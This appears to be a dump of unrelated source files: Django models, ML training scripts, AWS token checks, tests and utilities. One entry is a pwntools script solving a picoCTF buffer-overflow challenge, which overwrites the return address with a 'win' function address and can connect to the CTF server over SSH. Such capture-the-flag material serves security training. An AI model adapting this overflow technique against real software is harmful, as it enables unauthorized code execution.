self.yaz = "\n\tmov eax,4\n\tmov ebx, 1\n\tmov ecx, {}\n\tmov edx, {}\n\tint 80h\n"
self.ana = ""
def default_in(self):
return self.acilis
def default_out(self):
return self.kapanis
def sleep(self, uzunluk):
if "forsleep" not in self.acilis:
self.acilis = self.acilis.format("{}\n\tforsleep:\n\t\tsaniye: dd 0\n\t\tnanosaniye: dd 0\n")
self.ana += self.uyku.format(uzunluk)
self.ana
def ekranayaz(self, metin, son):
if son == 1:
metin += "\", 10,\""
elif son == 0:
pass
else:
print "bu yazdigim ilk derleme hata ayiklama blogu, hayirli ugurlu olsun"
exit(3)
self.acilis = self.acilis.format("{}\n\tmetin"+self.ds+": db \""+metin+"\"\n\tmetin"+self.ds+"_l: equ $-metin"+self.ds+"\n")
bir, iki = "metin"+self.ds, "metin"+self.ds+"_l"
self.ana += self.yaz.format(bir, iki)
self.ds += "a"
def save(self, isim):
op = open(isim.replace(".muco", ".asm"), "w+")
op.write(self.net())
op.close()
def cmd(self, co):
os.system(co)
def run(self, isim):
saf = isim.split(".")[0]
olu = saf+".o"
k1 = "nasm -f elf -o {} {}".format(olu, isim)
k2 = "ld -m elf_i386 -o {} {}".format(saf, olu)
k3 = "./" + saf
self.cmd(k1)
self.cmd(k2)
self.cmd(k3)
def net(self):
return self.acilis.replace("{}", "")+self.ana+self.kapanis
a = sablon()
a.sleep(2)
a.ekranayaz("iki saniye ", 0)
a.sleep(3)
a.ekranayaz("uc saniye", 1)
a.save("lemoco.muco")
a.run("lemoco.asm")
|
24,638 | b42f77560bd57b014ecdec56f0f4b66edb3e15cd | import os
import tensorflow as tf
from test_octree2col import Octree2ColTest
from test_octree_conv import OctreeConvTest
from test_octree_deconv import OctreeDeconvTest
from test_octree_property import OctreePropertyTest
from test_octree_search import OctreeSearchTest
if __name__ == "__main__":
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
tf.test.main() |
24,639 | 449a5ea139cae64ae0721d94ea966c112bece5f2 | # Description: This is the Python Server to RMI Project.
# Author: Gabriel David Sacca, Vitor Bueno de Camargo
# Created at: October, 09th. 2019
# Updated at: October, 09th. 2019
import Pyro4
from Notas import Notas
daemon = Pyro4.Daemon()
ns = Pyro4.locateNS()
uri = daemon.register(Notas)
ns.register("NotasService", uri)
print("Objeto registrado.")
daemon.requestLoop()
|
24,640 | 32d1b0d77d12bd86b71eb23e88389342ef46312c | from django.contrib import admin
# Register your models here.
from .models import *
class ProgressAdmin(admin.ModelAdmin):
list_display = ('student', 'question', 'right')
search_fields = ('student__user__username', 'question__text')
admin.site.register(Progress, ProgressAdmin)
class LessonAdmin(admin.ModelAdmin):
list_display = ('title', 'description')
search_fields = ('title', 'description', 'content')
admin.site.register(Lesson, LessonAdmin)
class AnswerAdmin(admin.ModelAdmin):
list_display = ('text', 'correct', 'question')
search_fields = ('text', 'question__text')
admin.site.register(Answer, AnswerAdmin)
class StudentAdmin(admin.ModelAdmin):
list_display = ('user',)
search_fields = ('id', 'user__username')
ordering = ['user']
admin.site.register(Student, StudentAdmin)
class AnswerInline(admin.StackedInline):
model = Answer
@admin.register(Question)
class QuestionAdmin(admin.ModelAdmin):
inlines = [
AnswerInline,
]
list_display = ('text', 'type', 'lesson')
search_fields = ('text', 'lesson__title', 'type')
# ordering = ['text', 'type']
|
24,641 | 213e8f771c2f2002236614f80b68b0d504af4c4d | import hondler.models
import hondler.signals
import hondler.urls |
24,642 | 6d0686fed2717a727cd9d2a81b56038d1d6a4017 | import json
import botocore
import subprocess
from av_agent_utils import okta_login
def check_sts_token_by_config(config_file):
if config_file == "run":
content = subprocess.check_output(['alienvault-agent.sh', 'config'])
else:
try:
with open(config_file) as f:
content = f.read()
except UnicodeDecodeError:
with open(config_file, encoding='utf-16') as f:
content = f.read()
data = json.loads(content)
opt = data['options']
return check_sts_token_by_key(
aws_access_key_id=opt['aws_access_key_id'],
aws_secret_access_key=opt['aws_secret_access_key'],
aws_session_token=opt['aws_session_token']
)
def check_sts_token_by_key(aws_access_key_id, aws_secret_access_key, aws_session_token):
session = okta_login()
this_client = session.client(
'sts',
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_session_token=aws_session_token,
)
try:
identity = this_client.get_caller_identity()
return {
'response': identity,
'status': 'success',
'aws_access_key_id': aws_access_key_id,
'aws_secret_access_key': aws_secret_access_key,
'aws_session_token': aws_session_token,
}
except botocore.exceptions.ClientError as e:
return {
'status': 'error',
'detail': str(e),
'response': None,
}
# I never did get this to work for my use case but I'll keep it here in case it's useful
# def simulate_policy(user_arn, action_names, resource_arns):
# session = okta_login()
#
# client = session.client(
# 'iam',
# #aws_access_key_id=aws_access_key_id,
# #aws_secret_access_key=aws_secret_access_key,
# #aws_session_token=aws_session_token,
# )
#
# r = client.simulate_principal_policy(
# PolicySourceArn=user_arn,
# ActionNames=action_names,
# ResourceArns=resource_arns,
# )
# return {
# 'status': 'success',
# 'response': r,
# } |
24,643 | f2a32e4e21cba583e36b37c46744bd2664c9aed6 | # Generated by Django 2.1.8 on 2019-11-19 15:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Goods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('g_name', models.CharField(max_length=32)),
('g_title', models.CharField(max_length=128)),
('g_introduction', models.CharField(max_length=128)),
('g_price', models.CharField(max_length=12)),
('g_original_price', models.CharField(max_length=12)),
('g_inventory', models.IntegerField()),
('g_photo', models.ImageField(upload_to='images')),
('g_hits', models.IntegerField(blank=True, null=True)),
('Whether_the_hot', models.CharField(default=0, max_length=4)),
('Whether_the_new', models.CharField(default=0, max_length=4)),
],
),
migrations.CreateModel(
name='HarvestAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=32)),
('gender', models.CharField(blank=True, max_length=4, null=True)),
('phone_number', models.CharField(max_length=32)),
('address', models.CharField(max_length=128)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('default', models.CharField(default=0, max_length=4)),
],
),
migrations.CreateModel(
name='Retail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('r_name', models.CharField(max_length=32)),
('r_introduction', models.CharField(max_length=128)),
('r_picture', models.ImageField(blank=True, null=True, upload_to='img')),
],
),
migrations.CreateModel(
name='ShoppingCart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('c_name', models.CharField(max_length=32)),
('c_price', models.CharField(max_length=12)),
('c_num', models.IntegerField()),
('c_photo', models.ImageField(upload_to='images')),
('c_price_sum', models.CharField(max_length=32)),
('c_add_time', models.DateTimeField()),
('c_inventory', models.IntegerField()),
('g_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Goods')),
('r_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Retail')),
],
),
migrations.CreateModel(
name='ShopType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('t_classify', models.CharField(max_length=32)),
('t_picture', models.ImageField(upload_to='img')),
('r_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Retail')),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=18)),
('username', models.CharField(blank=True, max_length=32, null=True)),
('age', models.CharField(blank=True, max_length=4, null=True)),
('gender', models.CharField(blank=True, max_length=4, null=True)),
('phone_number', models.CharField(blank=True, max_length=11, null=True)),
('picture', models.ImageField(blank=True, null=True, upload_to='img')),
('user_type', models.CharField(blank=True, max_length=4, null=True)),
],
),
migrations.AddField(
model_name='shoppingcart',
name='u_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.User'),
),
migrations.AddField(
model_name='goods',
name='r_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Retail'),
),
migrations.AddField(
model_name='goods',
name='t_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.ShopType'),
),
]
|
24,644 | 81219c52ae768299737fb0c128ba06e277b82379 | # 2017.05.04 15:24:54 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/Scaleform/genConsts/TEXT_ALIGN.py
class TEXT_ALIGN(object):
"""
DO NOT MODIFY!
Generated with yaml.
__author__ = 'yaml_processor'
"""
LEFT = 'left'
RIGHT = 'right'
CENTER = 'center'
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\genConsts\TEXT_ALIGN.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:24:54 Střední Evropa (letní čas)
|
24,645 | 6feaeeaf234efa40fba2183169e721a1eda54cfa | # Copyright 2016 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tests.common import BaseTest
class TestElastiCacheCluster(BaseTest):
def test_elasticache_cluster_simple(self):
session_factory = self.replay_flight_data('test_elasticache_cluster_simple')
p = self.load_policy({
'name': 'elasticache-cluster-simple',
'resource': 'cache-cluster'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 4)
def test_elasticache_cluster_simple_filter(self):
session_factory = self.replay_flight_data('test_elasticache_cluster_simple')
p = self.load_policy({
'name': 'elasticache-cluster-simple-filter',
'resource': 'cache-cluster',
'filters': [
{'type': 'value',
'key': 'Engine',
'value': 'memcached'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
def test_elasticache_cluster_delete(self):
session_factory = self.replay_flight_data('test_elasticache_cluster_delete')
p = self.load_policy({
'name': 'elasticache-cluster-delete',
'resource': 'cache-cluster',
'filters': [
{'type': 'value',
'key': 'Engine',
'value': 'memcached'}],
'actions': [
{'type': 'delete'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
def test_elasticache_cluster_snapshot(self):
session_factory = self.replay_flight_data('test_elasticache_cluster_snapshot')
p = self.load_policy({
'name': 'elasticache-cluster-snapshot',
'resource': 'cache-cluster',
'actions': [{'type': 'snapshot'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 4)
class TestElastiCacheSubnetGroup(BaseTest):
def test_elasticache_subnet_group(self):
session_factory = self.replay_flight_data('test_elasticache_subnet_group')
p = self.load_policy({
'name': 'elasticache-subnet-group',
'resource': 'cache-subnet-group'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
class TestElastiCacheSnapshot(BaseTest):
def test_elasticache_snapshot(self):
session_factory = self.replay_flight_data('test_elasticache_snapshot')
p = self.load_policy({
'name': 'elasticache-snapshot',
'resource': 'cache-snapshot'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 3)
def test_elasticache_snapshot_age_filter(self):
factory = self.replay_flight_data('test_elasticache_snapshot')
p = self.load_policy({
'name': 'elasticache-snapshot-age-filter',
'resource': 'cache-snapshot',
'filters': [{'type': 'age', 'days': 2}]},
session_factory=factory)
resources = p.run()
self.assertEqual(len(resources), 3)
def test_elasticache_snapshot_delete(self):
factory = self.replay_flight_data('test_elasticache_snapshot_delete')
p = self.load_policy({
'name': 'elasticache-snapshot-delete',
'resource': 'cache-snapshot',
'actions': ['delete']},
session_factory=factory)
resources = p.run()
self.assertEqual(len(resources), 3) |
24,646 | 89665ebedd149ebe10feb354fd61dcbba1b1d2a6 | # 在天之靈保佑 順利跑出結果
import logging
import fastText
import random
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from sklearn.cross_validation import train_test_split
def print_results(N, p, r):
print("N\t" + str(N))
print("P@{}\t{:.3f}".format(1, p))
print("R@{}\t{:.3f}".format(1, r))
def build_dataset(i_no):
text_data = []
label_data = []
with open("train_ft.txt", "r", encoding='utf-8') as readfile:
while True:
line = readfile.readline().strip()
if not line:
break
pass
(text, label_fine) = line.split("\t")
text_data.append(text)
label_data.append(label_fine)
x_train, x_test, y_train, y_test = train_test_split(text_data, label_data, test_size=0.2)
train_data = []
for index in range(len(x_train)):
tmp = str(x_train[index]) + "\t" + str(y_train[index]) + "\n"
train_data.append(tmp)
with open("train_ft_" + str(i_no) + ".txt", "w", encoding='utf-8') as file_to_write:
for index in train_data:
file_to_write.write(index)
test_data = []
for index in range(len(x_test)):
tmp = str(x_test[index]) + "\t" + str(y_test[index]) + "\n"
test_data.append(tmp)
with open("test_ft_" + str(i_no) + ".txt", "w", encoding='utf-8') as file_to_write:
for index in test_data:
file_to_write.write(index)
return
def build_dataset_cross():
text_data = []
label_data = []
with open("train_p4.txt", "r", encoding='utf-8') as readfile:
while True:
line = readfile.readline().strip()
if not line:
break
pass
text_data.append(line)
random.shuffle(text_data)
ran = 0
for i in range(5):
train_data = []
test_data = []
if ran > 0:
for index in range(ran):
tmp = str(text_data[index]) + "\n"
train_data.append(tmp)
for index in range(ran, int(ran + 24000)):
tmp = str(text_data[index]) + "\n"
test_data.append(tmp)
for index in range(int(ran + 24000), 120000):
tmp = str(text_data[index]) + "\n"
train_data.append(tmp)
with open("train_p4_" + str(i) + ".txt", "w", encoding='utf-8') as file_to_write:
for index in train_data:
file_to_write.write(index)
with open("test_p4_" + str(i) + ".txt", "w", encoding='utf-8') as file_to_write:
for index in test_data:
file_to_write.write(index)
ran += 24000
return
def get_dataset():
text_data = []
label_data = []
with open("train_ft.txt", "r", encoding='utf-8') as readfile:
while True:
line = readfile.readline().strip()
if not line:
break
pass
(text, label_fine) = line.split("\t")
text_data.append(text)
label_data.append(label_fine)
x_train, x_test, y_train, y_test = train_test_split(text_data, label_data, test_size=0.2)
train_data = []
for index in range(len(x_train)):
tmp = str(x_train[index]) + "\t" + str(y_train[index]) + "\n"
train_data.append(tmp)
with open("train_ft_1.txt", "w", encoding='utf-8') as file_to_write:
for index in train_data:
file_to_write.write(index)
test_data = []
for index in range(len(x_test)):
tmp = str(x_test[index]) + "\t" + str(y_test[index]) + "\n"
test_data.append(tmp)
with open("test_ft_1.txt", "w", encoding='utf-8') as file_to_write:
for index in test_data:
file_to_write.write(index)
return
def train(i_no,dim, epoch, minCount, wordNgrams):
train_data = "data/train_p3_" + str(i_no) + ".txt"
# train_data = "data/train_p_t_1.txt"
model = fastText.train_supervised(input=train_data, label="__label__", dim=dim, epoch=epoch, minCount=minCount,
wordNgrams=wordNgrams, loss="softmax")
return model
def classifier(model, i_no):
test_data = "data/test_ft_" + str(i_no) + ".txt"
print_results(*model.test(test_data))
return
def classifier_1(model_name, i_no):
test_file = "data/test_p3_" + str(i_no) + ".txt"
model = fastText.load_model(model_name)
r_text = []
r_label = []
with open(test_file, "r", encoding='utf-8') as readfile:
while True:
line = readfile.readline().strip()
if not line:
break
pass
(text, label_fine) = line.split("\t")
r_text.append(text)
# label_fine.replace("__label__", "")
r_label.append(label_fine)
# print(model.predict(r_text))
# print("test file loadin success")
p_label = [item[0] for item in model.predict(r_text)[0]]
print("get predict result success")
r_label_class = list(set(r_label))
p_label_class = list(set(p_label))
right_no = dict.fromkeys(r_label_class, 0) # 预测正确的各个类的数目
real_no = dict.fromkeys(r_label_class, 0) # 测试数据集中各个类的数目
predict_no = dict.fromkeys(p_label_class, 0) # 预测结果中各个类的数目
# print(right_no.keys())
# print(real_no.keys())
# print(predict_no.keys())
for i in range(len(r_label)):
real_no[r_label[i]] += 1
predict_no[p_label[i]] += 1
if r_label[i] == p_label[i]:
right_no[r_label[i]] += 1
# print(right_no)
# print(real_no)
print(predict_no)
f1_score = 0.0
r_no = re_no = p_no = 0.0
for key in right_no:
r_no += right_no[key]
for key in real_no:
re_no += real_no[key]
for key in predict_no:
p_no += predict_no[key]
all_p = 0.0
all_r = 0.0
for key in real_no:
try:
if real_no[key] == 0:
r = 1.0
else:
r = float(right_no[key]) / float(real_no[key])
if predict_no[key] == 0:
p = 1.0
else:
p = float(right_no[key]) / float(predict_no[key])
all_p += p
all_r += r
f = p * r * 2 / (p + r)
# print("%s:\t p:%f\t r:%f\t f:%f" % (key, p, r, f))
f1_score += f * float(real_no[key])
except:
print("error:", key, "right:", right_no.get(key, 0), "real:", real_no.get(key, 0), "predict:",
predict_no.get(key, 0))
f1_score = f1_score / 24000.0
all_p /= 8.0
all_r /= 8.0
print("Precise:" + str(all_p))
print("Recall: " + str(all_r))
print("Macro_Average_F1_Score:" + str(f1_score))
return all_p, all_r, f1_score
if __name__ == "__main__":
# build_dataset_cross()
F1_score = 0.00
Precise = 0.00
Recall = 0.00
for index in range(5):
print("Model" + str(index) + ":")
dim = 150
epoch = 5
minCount = 1
wordNgrams = 1
# build_dataset(index)
# 获取数据集
# get_dataset()
# print("DataSet Build Success")
# 训练获得模型
model = train(index, dim, epoch, minCount, wordNgrams)
# print("Model Training Success")
# 保存模型
model_name = "model/ft_thu_model_1_" + str(index) + ".bin"
model.save_model(model_name)
# print("Save model success")
# 获取测试结果
# classifier(model)
(allp, allr, fscore) = classifier_1(model_name, index)
Precise += allp
Recall += allr
F1_score += fscore
Precise /= 5
Recall /= 5
print("Precise:" + str(Precise))
print("Recall: " + str(Recall))
print("5_fold_corss_validation result:")
F1_score /= 5
print(F1_score)
|
24,647 | 45e8493907ead5921a7a6ffd8ebd77ed79865202 | # coding=utf-8
# https://www.acmicpc.net/problem/2504
# 4개의 기호 ‘(’, ‘)’, ‘[’, ‘]’를 이용해서 만들어지는 괄호열 중에서 올바른 괄호열이란 다음과 같이 정의된다.
# 한 쌍의 괄호로만 이루어진 ‘()’와 ‘[]’는 올바른 괄호열이다.
# 만일 X가 올바른 괄호열이면 ‘(X)’이나 ‘[X]’도 모두 올바른 괄호열이 된다.
# X와 Y 모두 올바른 괄호열이라면 이들을 결합한 XY도 올바른 괄호열이 된다.
# 예를 들어 ‘(()[[]])’나 ‘(())[][]’ 는 올바른 괄호열이지만 ‘([)]’ 나 ‘(()()[]’ 은 모두 올바른 괄호열이 아니다.
# 우리는 어떤 올바른 괄호열 X에 대하여 그 괄호열의 값(괄호값)을 아래와 같이 정의하고 값(X)로 표시한다.
# ‘()’ 인 괄호열의 값은 2이다.
# ‘[]’ 인 괄호열의 값은 3이다.
# ‘(X)’ 의 괄호값은 2×값(X) 으로 계산된다.
# ‘[X]’ 의 괄호값은 3×값(X) 으로 계산된다.
# 올바른 괄호열 X와 Y가 결합된 XY의 괄호값은 값(XY)= 값(X)+값(Y) 로 계산된다.
# 예를 들어 ‘(()[[]])([])’ 의 괄호값을 구해보자. ‘()[[]]’ 의 괄호값이 2 + 3×3=11 이므로 ‘(()[[ ]])’의 괄호값은 2×11=22 이다. 그리고 ‘([])’의 값은 2×3=6 이므로 전체 괄호열의 값은 22 + 6 = 28 이다.
# 여러분이 풀어야 할 문제는 주어진 괄호열을 읽고 그 괄호값을 앞에서 정의한대로 계산하여 출력하는 것이다.
# 입력
# 첫째 줄에 괄호열을 나타내는 문자열(스트링)이 주어진다. 단 그 길이는 1 이상, 30 이하이다.
# 출력
# 첫째 줄에 그 괄호열의 값을 나타내는 정수를 출력한다. 만일 입력이 올바르지 못한 괄호열이면 반드시 0을 출력해야 한다.
s = input()
stack = []
op = ['(','[']
cp = [')',']']
empty = lambda : True if len(stack)==0 else False
for c in s:
if c in op:
stack.append(c)
else:
if empty():
print(0)
exit()
_t1 = 0
_t = stack.pop()
while (_t not in op):
_t1 += _t
if empty():
print(0)
exit()
_t = stack.pop()
if cp.index(c) != op.index(_t):
print(0)
exit()
_t1 = 1 if _t1==0 else _t1
stack.append(_t1* (cp.index(c)+2))
try:
print(sum(stack))
except:
print(0)
|
24,648 | be9063705359508c84f9affc78963b2d1eb78956 | #!/usr/bin/env python
from pwn import *
import sys
argv = len(sys.argv)
#get win_addr
e = ELF('./vuln')
win = e.symbols['win']
#start process locally or remotely based on args given
if argv > 1:
from getpass import getpass
ssh = ssh(host='2018shell.picoctf.com', user='ems3t', password=getpass())
p = ssh.process('vuln', cwd='/problems/buffer-overflow-1_0_787812af44ed1f8151c893455eb1a613')
else:
p = process('./vuln')
'''
pwn cyclic 50 | strace ./vuln
pwn cyclic -l 0x6161616c
44
'''
#set buf amount
buf = 44
#build payload
payload = ''
payload+= 'A'*buf
payload+=p32(win)
#send exploit and start interactive mode
p.sendline(payload)
p.interactive() |
24,649 | a2bcd90fc9dd0a5a8cd0d61f8d39ec39af9d5b56 | import json
import glob
import os
import ArgParser as ap
class TextSweeper(object):
'''
Class for replacing text in text files in different ways.
Input:
scandict (dictionary)
Dictionary used to inform what text to replace in files.
If any key is found in a text file, it is replaced with the
value.
'''
def __init__(self,scandict=None):
if scandict is not None:
self.scandict = scandict
def OpenJSON(self,loc):
with open(loc,"r") as f:
self.scandict = json.load(loc)
print("SCANDICT IS: " + str(self.scandict))
def ReplaceInFile(self,infile,outfile):
'''Given an input file, open the file and replace any keys in
the scandict object with their values. Save to output file location.'''
newfile = []
with open(infile,"r") as f:
oldfile = f.readlines()
newfile = []
for l in oldfile:
for key in self.scandict:
if l.find(key)!=-1:
l=l.replace(key,self.scandict[key])
newfile.append(l)
f.close()
with open(outfile,"w") as f:
for line in newfile:
f.write(line)
f.close()
def ReplaceInDirectoryFiles(self,infiledir,outfiledir):
'''Given an input directory, scan all files in the directory for
keys in the scandict, and replace with values. Save the files to
the outfiledir'''
if not os.path.exists(outfiledir):
os.mkdir(outfiledir)
infiles = glob.glob("%s/*"%(infiledir))
if ap.args.DEBUG:
print("INFILEDIR: %s"%(infiledir))
for fi in infiles:
infiletail = fi.replace(infiledir,"")
if ap.args.DEBUG:
print("INFILETAIL: %s"%(infiletail))
self.ReplaceInFile(fi,"%s/%s"%(outfiledir,infiletail))
|
24,650 | 7c0bbf39d415a0ff911fe920a2322efb879dfbd8 | import math
import sys
import psutil
import os
from os import path, write
from file_utils import *
amount_of_ram_to_be_used = (psutil.virtual_memory().free * 0.05)
dupe_loc = set()
curr_set = set()
dupe_count = 0
total_lines = 0
fill_set_line_count = 0
offset_by = 0
leftover = 0
def get_total_lines(filename):
global total_lines
global leftover
total_lines = get_line_count(filename)
print("# of lines in file:", total_lines)
leftover = total_lines
def fill_set(file_input):
global fill_set_line_count
global dupe_count
global offset_by
global leftover
fill_set_dupe_count = 0
with open(file_input, 'r') as input:
for line in input:
if curr_set.__sizeof__() < amount_of_ram_to_be_used:
fill_set_line_count += 1
if fill_set_line_count > offset_by:
if fill_set_line_count in dupe_loc:
continue
if line in curr_set:
dupe_loc.add(fill_set_line_count)
fill_set_dupe_count += 1
else:
curr_set.add(line)
print("# of dupes while filling set:", fill_set_dupe_count)
dupe_count += fill_set_dupe_count
offset_by = fill_set_line_count
fill_set_line_count = 0
leftover = total_lines - offset_by
print("leftover:", leftover)
compare_to_file(file_input)
def compare_to_file(file_input):
with open(file_input, 'r') as input:
global dupe_count
counter = 0
line_count = 0
for line in input:
line_count += 1
if line_count > offset_by:
if line_count in dupe_loc:
continue
if line in curr_set:
dupe_loc.add(line_count)
counter += 1
print("# of dupes in rest of file that is contained in current set", counter)
dupe_count += counter
print("current # of duplicates found", dupe_count)
curr_set.clear()
# Pretty much unused/ slower than just writing to a new file
def removeLineHelper(file_input, line_selection):
fro = open(file_input, "r")
current_line = 0
while current_line < line_selection:
fro.readline()
current_line += 1
seekpoint = fro.tell()
frw = open(file_input, "r+")
frw.seek(seekpoint, 0)
# read the line we want to discard
fro.readline()
# now move the rest of the lines in the file
# one line back
chars = fro.readline()
while chars:
frw.writelines(chars)
chars = fro.readline()
fro.close()
frw.truncate()
frw.close()
def writeFile(filename, output):
line_count = 0
with open(filename, 'r') as readfile:
with open(output, 'w') as writefile:
for line in readfile:
line_count += 1
if line_count in dupe_loc:
continue
else:
writefile.writelines(line)
# Counter starts at 1 since the first line in the text file is line 0
# counter is then incremented for each removal in the array of duplicates
def delete_lines(filename):
dupe_loc.sort()
counter = 1
for x in dupe_loc:
counter += 1
dupe_loc.clear()
def main(filename, output):
add_newline_if_missing(filename)
get_total_lines(filename)
while(leftover != 0):
fill_set(filename)
if offset_by == total_lines:
break
writeFile(filename, output)
print("total dupes", dupe_count) |
24,651 | 3b8a158fa713102efaf05aa4ff78f70ff8f9c334 | # Generated by Django 3.0.5 on 2020-04-25 15:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('apis', '0011_delete_user'),
]
operations = [
migrations.DeleteModel(
name='Manager',
),
]
|
24,652 | 607868d43ac983ae30db9ba236ba3c2cfdc34c0e | import pytest
from MobileApps.libs.flows.ios.jweb_data_collection.flow_container import FlowContainer
@pytest.fixture(scope="session", autouse=True)
def ios_jweb_data_collection_setup(request, session_setup):
"""
This fixture is for Ios Data Collection set up :
- Get driver instance
- Get FlowContainer instance
- Install latest Ios Data Collection app
"""
driver = session_setup
fc = FlowContainer(driver)
return driver, fc |
24,653 | f56f8efb6386b2b3f3b291eda3b1334a41fc522a | # If needed, you can define your own additional functions here.
# Start of your additional functions.
# End of your additional functions.
def convert_to_list(num_list_str):
# Modify the code below
return []
|
24,654 | ad2028480f6757a87920b7d12e4fa1d2f86d18a0 | """
将两个有序链表合并为一个新的有序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。
示例:
输入:1->2->4, 1->3->4
输出:1->1->2->3->4->4
方法 1:递归
想法
我们可以如下递归地定义在两个链表里的 merge 操作(忽略边界情况,比如空链表等):
\left\{ \begin{array}{ll} list1[0] + merge(list1[1:], list2) & list1[0] < list2[0] \\ list2[0] + merge(list1, list2[1:]) & otherwise \end{array} \right.
{
list1[0]+merge(list1[1:],list2)
list2[0]+merge(list1,list2[1:])
list1[0]<list2[0]
otherwise
也就是说,两个链表头部较小的一个与剩下元素的 merge 操作结果合并。
算法
我们直接将以上递归过程建模,首先考虑边界情况。
特殊的,如果 l1 或者 l2 一开始就是 null ,那么没有任何操作需要合并,所以我们只需要返回非空链表。否则,我们要判断 l1 和 l2 哪一个的头元素更小,然后递归地决定下一个添加到结果里的值。如果两个链表都是空的,那么过程终止,所以递归过程最终一定会终止。
方法 2:迭代
想法
我们可以用迭代的方法来实现上述算法。我们假设 l1 元素严格比 l2元素少,我们可以将 l2 中的元素逐一插入 l1 中正确的位置。
算法
首先,我们设定一个哨兵节点 "prehead" ,这可以在最后让我们比较容易地返回合并后的链表。我们维护一个 prev 指针,我们需要做的是调整它的 next 指针。然后,我们重复以下过程,直到 l1 或者 l2 指向了 null :如果 l1 当前位置的值小于等于 l2 ,我们就把 l1 的值接在 prev 节点的后面同时将 l1 指针往后移一个。否则,我们对 l2 做同样的操作。不管我们将哪一个元素接在了后面,我们都把 prev 向后移一个元素。
在循环终止的时候, l1 和 l2 至多有一个是非空的。由于输入的两个链表都是有序的,所以不管哪个链表是非空的,它包含的所有元素都比前面已经合并链表中的所有元素都要大。这意味着我们只需要简单地将非空链表接在合并链表的后面,并返回合并链表。
"""
# definition for singly-linked list
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution1:
def mergeTwoLists(self, l1, l2):
if l1 == None:
return l2
elif l2 == None:
return l1
elif l1.val < l2.val:
l1.next = self.mergeTwoLists(l1.next, l2)
return l1
else:
l2.next = self.mergeTwoLists(l1, l2.next)
return l2
class Solution2:
def mergeTwoLists(self, l1, l2):
# 设定一个哨兵节点,可以在最后比较容易的返回合并后的链表
prehead = ListNode(-1)
# 维护一个prev指针
prev = prehead
while l1 and l2:
if l1.val < l2.val:
prev.next = l1
l1 = l1.next
else:
prev.next = l2
l2 = l2.next
prev = prev.next
prev.next = l1 if l1 is not None else l2
return prehead.next
|
24,655 | 575a392af428915a222e16ed34b51487e97292d2 | import cv2
import numpy as np
import os
import pickle
#import matplotlib.pyplot as plt
from mtcnn.mtcnn import MTCNN
from sklearn.preprocessing import LabelEncoder
#from keras.utils import to_categorical
import random
import argparse
from tqdm import tqdm
parser = argparse.ArgumentParser()
parser.add_argument('--image_path', type=str, default='./FaceData',
help='Path to the directory containing people data.')
parser.add_argument('--output_face', type=str, default='./faceimg',
help='Path to the directory to save Face_Image.')
parser.add_argument('--output_data', type=str, default='./dataset',
help='Path to the directory to create Pickle outputs.')
IMG_SIZE = 224
def pickle_data(filename, data):
saved_data = open(filename, "wb")
pickle.dump(data, saved_data)
saved_data.close()
def extract_face(image, required_size=(224, 224)):
faces = []
detector = MTCNN()
face_coords = detector.detect_faces(image)
for face_coord in face_coords:
x, y, w, h = face_coord['box']
face = image[y:y+h, x:x+w]
if face.shape[0] > 0 and face.shape[1] >0:
if face.shape < required_size:
face = cv2.resize(face, required_size,
interpolation=cv2.INTER_AREA)
else:
face = cv2.resize(face, required_size,
interpolation=cv2.INTER_CUBIC)
faces.append(face)
return faces
def gen_dataset(image_path):
print('Extracting faces from dataset')
count = 0
labels_dic = {}
image_path = 'FaceData/'
people = [person for person in os.listdir(image_path)]
count = 0
for i, person in enumerate(people):
labels_dic[i] = person
dir = 'faceimg/{}'.format(person)
if not os.path.isdir(dir):
os.mkdir(dir)
print('Extracting {} face'.format(person))
for image in tqdm(os.listdir(os.path.join(image_path, person))):
img = cv2.imread(os.path.join(os.path.join(image_path, person), image), cv2.COLOR_BGR2RGB)
faces = extract_face(img, (IMG_SIZE, IMG_SIZE))
for face in faces:
